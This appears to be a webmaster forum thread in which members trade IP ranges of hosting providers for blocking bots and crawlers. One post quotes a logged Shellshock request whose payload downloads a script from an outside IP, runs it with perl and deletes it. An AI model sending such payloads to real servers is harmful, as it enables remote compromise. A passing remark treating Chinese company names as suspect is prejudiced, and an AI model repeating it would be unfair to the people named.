Digital Network, Russia A.K.A. di-net.ru or msm.ru:

95.163.64.0/18
95.163.128.0/17
95.163.64.0 - 95.163.255.255

213.248.0.0/18
213.248.0.0 - 213.248.63.255

This is hosting (server farm) but they also offer ADSL, network-to-network fiber and something called "optical data channels" which might be video/movie streaming.

WW says:

Age:Allowable time to edit post has past.

Hate it when it says that!

Nope, I was wrong. Searches for "optical data channels" mostly returned patent papers. Those are always a barrel of fun. What I think I learned was that optical data channels are a beneficial alternative to current fiber for node-to-node communications. Pretty much a no-brainer if you ask me!

As far as I know Virgin Media does not do hosting, and there does not seem to be anything on their site to indicate they do. Certainly Lucy's IP has open ports but my suspicion is that it's a business or net-nut running its own server (216 and 217 both have open ports so probably both "owned" by the same person/business). This arrangement happens a lot on broadband lines - I run a backup mail server on mine, for example.

I often see bots other than obvious botnets run from broadband (personal or business) that seem to be otherwise simple browsing connection points. Typical at the moment are screaming frog and email-marketing-robot, both blocked.

I only know that the specific IP I named is (or includes) a server because my lookup told me that "1 website uses" etcetera. That implies a reasonably permanent address.

O' course it could be the boss's nephew doing some botrunning on the side-- or an infected computer that only coincidentally lives on the same IP as a website. (It was an established botnet, though I can't remember which one. Heck, it was almost 24 hours ago.)

Sinobot living at Telentia Chicago
104.222.192.0 - 104.222.223.255
104.222.190.0/23 and 104.222.192.0/18 ber...locked!

104.222.190.0/23 ? Bigger fish at:

servernetwork.com A.K.A networklayertech.net
104.222.160.0/19
104.222.160.0 - 104.222.191.255


And my math says 104.222.192.0 - 104.222.223.255 = 104.222.192.0/19 (not 18)

But other than that, thanks for the ranges Angonasec :)

domaine-achat.fr A,K,A. privianet.com or serveur-dedie.fr*
91.212.205.0/24
91.212.205.0 - 91.212.255.255

*With 3 TLD aliases, it's a solid bet there's more ranges (cue Wilderness.)


HostEx
31.193.192.0/21
31.193.192.0 - 31.193.199.255

volia.net
93.73.0.0/16
93.73.0.0 - 93.73.255.255

Ukraine ISP that also offers hosting. I got hit with a typical probe for php vulnerabilities. Unable to scan to determine server ranges. With mixed service providers I usually wait and see how much trouble they become before taking defensive measures. Don't really know if this tactic servers my purpose well, but it enables me a sense of pragmatism.

New one for me from DIGITALOCEAN

NetRange: 45.55.0.0 - 45.55.255.255
CIDR: 45.55.0.0/16
NetName: DIGITALOCEAN-11
RegDate: 2015-02-05

I've seen hits from all across:

volia.net
93.72.0.0/13

(though volia have a lot of other ranges)

I always enjoy visits from these guys because of their charming line in rDNS, e.g.

93.72.0.0 born.clothes.volia.net
93.74.48.236 pileless.fatalities.volia.net
93.75.101.231 juxtaposed-cupboard.volia.net
93.73.122.41 transistor.inhere.volia.net
93.73.186.130 productless.trademark.volia.net
93.73.38.10 arguable.hygiene.volia.net

Interestingly, 90% of them are Synapse visits...

keyplr - volia.net - I have about 100 hits from the company since about 2010 but very few are later than mid-2013. Most hits were one-offs; about five over 10. Frankly, I get far more aggro from my own country! :(

I'll leave blocking for now, until something hits hard-ish.

New one for me

At this point I got curious and went to do some spot-checking, as I'd got much of 45 listed as bogons (not sure why, since some of them are claiming registrations as far back as 1996). In a race to see how many I could hit before free lookup got annoyed and started demanding proof of humanity on every third request:

Holy ###, what a dense cloud of robots.
45.2-3 IANA Reserved (I think this means nobody will ever be visiting from there)
45.4-7 bogons under LACNIC
45.8-15 bogons under RIPE
RIPE I can understand, but why on earth does LACNIC need extra room when you can still walk in off the street and pick up a /12? Be that as it may, I think a lot of 45 has been reassigned; 64-65 (at a minimum) belongs to assorted APNIC countries in RIPE-sized niblets, and there are a couple of LACNIC countries further down.

Moving on ...

45.16-31 45.16.0.0/12 AT&T

45.32 Choopa

45.33.0-127 45.33.0.0/17 Softlayer / Linode
45.33.128-143 45.33.128.0/20 Hurricane Electric
45.33.144-159 45.33.144.0/20 Enzu
45.33.160-191 45.33.160.0/19 Colo America
45.33.192-207 45.33.192.0/20 Infinite Web (never heard of 'em, but they don't sound human)
45.33.208-223 45.33.208.0/20 nothing yet
45.33.224-239 45.33.224.0/20 Cloud South (Serverlogy Corp.)
45.33.240-255 45.33.240.0/20 Hengtong IDC

I realize that there are plenty of perfectly legitimate humans with Chinese names, and some of those humans may choose to give Chinese names to perfectly legitimate US-based corporations ... but still, I am always suspicious. Right now I'm in high hopes for a
45.32.0.0/15

45.34-35 45.34.0.0/15 Psychz
... OK, make that
45.32.0.0/14

After this it gets less interesting, and for a while breaks into annoying /21 and even /22 slivers (honestly, who do they think they are, RIPE?). Highlights:

45.38-39 45.38.0.0/15 EGI Hosting
45.40.48-63 45.40.48.0/20 XeHost
45.40.96-127 45.40.96.0/19 KVC Hosting
45.40.128-191 45.40.128.0/18 Godaddy
45.40.192-255 45.40.192.0/18 OppoBox

45.41 0-63 45.41.0.0/18 Virtuzo (human? who knows...)
45.41.80-95 45.41.80.0/20 Hengtong IDC (yes, them again)
45.41.192-255 45.41.192.0/18 HostAware

45.42.32-35 45.42.32.0/22 Epic Hosting
45.42.52-55 45.42.52.0/22 Desert Cloud
(Anyone know? Google was amazingly unhelpful, aside from offering a lot of pretty pictures, but the name element "cloud" naturally raises suspicion.)
45.42.80-95 45.42.80.0/20 Hengdong (for those who are keeping count, that makes three)
45.42.128-255 45.42.128.0/17 Roya Hosting
Sadly, the intervening bits of 45.42 appear to be human.

45.43.32-63 45.43.32.0/19 XeHost
45.43.128-191 45.43.128.0/18 Cloud South
(see above about "Cloud")
45.43.224-239 45.43.224.0/20 Yunxin LLC
(and see above about perfectly legitimate humans with Chinese names)

45.45.128-255 45.45.128.0/17 Contina
(wtf? I thought Contina was infection-prone Russians)

45.54.0-127 45.54.0.0/17 Host Virtual
45.54.128-255 45.54.128.0/17 Union Pacific Railroad
(I mention this only because I was staggered to learn that any railroad in the US is acquiring assets. Of any kind.)

45.55 45.55 Digital Ocean
(This was where we came in.)

45.56 0-63 45.56.0.0/18 Google Fiber
(wtf? Was there a post about this?)
45.56.64-127 45.56.64.0/18 Linode
45.56.128-191 45.56.128.0/18 Hosting Services / Simple Link
45.56.192-255 45.56.192.0/18 Sago Networks
(The last is human, darn it, so there goes your /16 out the window.)

45.57.0-127 45.57.0.0/17 Netflix
45.57.128-255 45.57.128.0/17 B2Net / ServerMania
(Well, that's something at least.)

45.58.48-63 45.58.48.0/20 HostUs
45.58.64-79 45.58.64.0/20 DropBox
45.58.112-127 45.58.112.0/20 ReliableSite / Choopa
45.58.128-191 45.58.128.0/18 SharkTech
(Don't know what that last one is, but it sure doesn't sound human.)

45.59.16-31 45.59.16.0/20 Aventice
... and that was as far as I got before free lookup pulled the plug. Watch out for this range, though; they're sublets, so absolutely anything could happen, at absolutely any size. (The random number I looked up was a /29.)

45.41 0-63 45.41.0.0/18 Virtuzo (human? who knows...)

virtuzo.com = dedicated servers

filoo.de
93.190.64.0/21
93.190.64.0 - 93.190.71.255

45.58.64-79 45.58.64.0/20 DropBox

@lucy24 - Thanks for the 45s but curious why you included DropBox. Have you seen hits to your sites from DropBox? Do they crawl? hot-link?

I was under the impression they were just a file depository.

I mentioned them only in the general category of "places that are not likely to result in a human visit, so if you like blocking the largest possible chunks this one is probably safe". (No point here specifically, since /18 is no more bytes than /17, and I wouldn't even know how to calculate how much traffic you'd need to get before that extra digit made a difference-- if in fact it ever does.) afaik I've never set eyes on them.

Elsewhere...

138.128.0.0/17
Fluid Servers

Never heard of 'em before today, but when the first visit is from a long-running botnet...

I have 138.128.0.0/17 as servermania.com

Another one to add to the 45. list:

Hostaware Singapore/Micfo, LLC.

45.62.32.0 - 45.62.63.255
45.62.32.0/19

Lucy: Sharktech - I have the following for them, all blocked (and including your latest - thanks!).

45.58.128.0 - 45.58.191.255
64.32.0.0 - 64.32.31.255
67.21.64.0 - 67.21.95.255
70.39.64.0 - 70.39.127.255
174.128.224.0 - 174.128.255.255
198.148.80.0 - 198.148.95.255
199.115.96.0 - 199.115.103.255
204.188.192.0 - 204.188.255.255
208.98.0.0 - 208.98.63.255

A Small Orange LLC
NetRange: 23.91.64.0 - 23.91.79.255
CIDR: 23.91.64.0/20

23.91.64.40 (server1.taterinc.com) pretends to be Mozilla/4.0 (compatible; MSIE 5.5)

New (to me) VolumeDrive range:

104.193.8.0 - 104.193.11.255
104.193.8.0/22

tldc.com A.K.A. uaservers.net
217.12.192.0/19
217.12.192.0 - 217.12.233.255

Ukraine Hosting on Dutch Data Center

^^ itldc.com ^^

hospedajeydominios.com (hosting and domains in Spain)
46.29.48.0/22
46.29.48.0 - 46.29.51.255

Bash attack attempted from these guys:

"GET /cgi-bin/hello HTTP/1.0" 403 301 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download [195.10.212.17...] -O [195.10.212.17...] [195.10.212.17...] /tmp/ji*;perl tmp/ji;rm -rf /tmp/ji*\""

DataGuard (dataguard.no) multi-product ISP including hosting/colo
213.158.224.0/19
213.158.224.0 - 213.158.255.255

RamHost
199.180.248.0/21
199.180.248.0 - 199.180.255.255

Ecatel.info
80.82.64.0/20
80.82.64.0 - 80.82.79.255

alphamegahosting.com
86.109.8.0/21
86.109.8.0 - 86.109.15.255

webhosting.uk.com
109.75.160.0/21
109.75.160.0 - 109.75.175.255

(is there an echo in here?)

alphamegahosting is actually 86.109.0.0/19 but thanks for the hint! :)

Thanks dstiles - my mobile tool doesn't supply broader ranges sometimes, even if I manually input it sometimes gives no results. Better than waiting days until I get back to the office though.